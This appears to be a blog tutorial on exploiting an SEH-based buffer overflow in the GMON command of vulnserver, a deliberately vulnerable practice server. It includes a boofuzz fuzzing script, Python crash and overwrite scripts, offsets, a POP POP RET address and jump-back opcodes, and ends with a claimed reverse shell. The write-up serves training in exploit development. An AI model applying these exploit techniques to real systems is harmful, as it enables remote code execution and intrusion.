Vulnserver GMON exploit

SEH based buffer overflow for GMON command in vulnserver.

Crashing the program!

For fuzzing the program we will be using the following script template. This script keeps on fuzzing the server as long as it responds with the banner.

from boofuzz import *
import time
def get_banner(target, my_logger, session, *args, **kwargs):
banner_template = b"Welcome to Vulnerable Server! Enter HELP for help."
try:
banner = target.recv(10000)
except:
print("Unable to connect. Target is down. Exiting.")
exit(1)
my_logger.log_check('Receiving banner..')
if banner_template in banner:
my_logger.log_pass('banner received')
else:
my_logger.log_fail('No banner received')
print("No banner received, exiting..")
exit(1)
def main():session = Session(
target=Target(
connection=SocketConnection("192.168.0.109", 9999, proto='tcp')
),sleep_time=0.5,
)
# Setup
s_initialize(name="Request")
with s_block("Host-Line"):
s_static("GMON", name='command name')
s_delim(" ", fuzzable=False)
s_string("FUZZ")
s_delim("\r\n")
# Fuzzing
session.connect(s_get("Request"), callback=get_banner)
session.fuzz()
if __name__ == "__main__":
main()
No Banner as program crashed
import socket
import os
import sys
host = "192.168.0.109"
port = 9999
buffer = 'A'*5013s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send("GMON /.:/" + buffer)
print s.recv(1024)
s.close()
Registers are overwritten with 41
SEH Chain corrupted with 41
#Original crash payload size = 5013
#SEH Handler Offset = 3519
#nSEH Offset is 3519-4 = 3515
seh = "BBBB"
nseh = "CCCC"
buffer = 3515*"A"
buffer+= nseh
buffer+= seh
buffer+= "D"*(5013-len(buffer))
s.send("GMON /.:/" + buffer)
Successfully placed B and C in SEH and nSEH respectively

Checking for bad characters

We send the usual bad characters test array without 0x00 since it is almost always a bad character. We place the bad characters array inside the ‘A’ buffer area and see if any gets corrupted in memory.

No bad characters detected other than 0x00

POP, POP, RET!

We use mona to find a location in the program which has the POP POP RET sequence using the command !mona seh.

POP POP RET locations
#Original crash payload size = 5013
#SEH Handler Offset = 3519
#nSEH Offset is 3519-4 = 3515
seh = "\x2B\x17\x50\x62"
nseh = "\xEB\x06\x90\x90"
buffer = ""
buffer+= "A"*3515
buffer+= nseh
buffer+= seh
buffer+= "D"*(5013-len(buffer))
s.send("GMON /.:/" + buffer)
Breakpoint added on POP POP RET memory location
Short Jump

Jumping Back

For jumping back we need to know the exact number of bytes we need to jump so that we can reach the beginning of ‘A’s. We can use the Offset tool to get the difference between the ESP and the address of the first ‘A’.

push esp
pop eax
add ax, 0x565
jmp eax
seh = "\x2B\x17\x50\x62"
nseh = "\xEB\x06\x90\x90"
jumpback = "\x54\x58\x66\x05\x65\x05\xff\xe0"
buffer = ""
buffer+= "A"*3515
buffer+= nseh
buffer+= seh
buffer+= jumpback
buffer+= "D"*(5013-len(buffer))
EIP is at the memory location where ‘A’s are stored
Got reverse shell!

Reference

  1. http://www.securitytube.net/groups?operation=view&groupId=7
  2. https://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/
  3. https://www.fuzzysecurity.com/tutorials/expDev/3.html
  4. https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

I like computers and offensive security.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store